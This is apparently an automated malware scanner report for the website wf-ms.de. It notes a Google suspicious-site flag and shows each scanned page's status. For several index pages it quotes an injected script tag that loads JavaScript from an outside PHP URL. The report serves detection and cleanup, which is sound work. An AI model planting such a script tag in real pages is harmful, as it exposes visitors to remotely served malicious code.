New scan:

Malware Scanner report for wf-ms.de

Malicious/Suspicious/Total urls checked
0/8/15
8 pages have suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "wf-ms.de" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=wf-ms.de

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://wf-ms.de/
200 OK
Content-Length: 19247
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=5169707"></script>

http://wf-ms.de/./assets/rollover.js
200 OK
Content-Length: 24561
Content-Type: application/javascript
clean
http://wf-ms.de/./index.html
200 OK
Content-Length: 19247
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=5169707"></script>

http://wf-ms.de/././assets/rollover.js
200 OK
Content-Length: 24561
Content-Type: application/javascript
clean
http://wf-ms.de/././index.html
200 OK
Content-Length: 19247
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=5169707"></script>

http://wf-ms.de/./././assets/rollover.js
200 OK
Content-Length: 24561
Content-Type: application/javascript
clean
http://wf-ms.de/./././index.html
200 OK
Content-Length: 19247
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=5169707"></script>

http://wf-ms.de/././././assets/rollover.js
200 OK
Content-Length: 24561
Content-Type: application/javascript
clean
http://wf-ms.de/././././index.html
200 OK
Content-Length: 19247
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=5169707"></script>

http://wf-ms.de/./././././assets/rollover.js
200 OK
Content-Length: 24561
Content-Type: application/javascript
clean
http://wf-ms.de/./././././index.html
200 OK
Content-Length: 19247
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=5169707"></script>

http://wf-ms.de/././././././assets/rollover.js
200 OK
Content-Length: 24561
Content-Type: application/javascript
clean
http://wf-ms.de/././././././index.html
200 OK
Content-Length: 19247
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=5169707"></script>

http://wf-ms.de/./././././././assets/rollover.js
200 OK
Content-Length: 24561
Content-Type: application/javascript
clean
http://wf-ms.de/./././././././index.html
200 OK
Content-Length: 19247
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://heirem-art.de/crpzw3bh.php?id=5169707"></script>


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: wf-ms.de

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 25 Feb 2015 16:39:07 GMT
Accept-Ranges: bytes
ETag: "c3142a0d-4b2f-50f1f630e1dcd"
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Length: 19247
Content-Type: text/html
Last-Modified: Sun, 15 Feb 2015 12:12:43 GMT

...19247 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: wf-ms.de
Referer: http://www.google.com/search?q=wf-ms.de

Result:
The result is similar to the first query. There are no suspicious redirects found.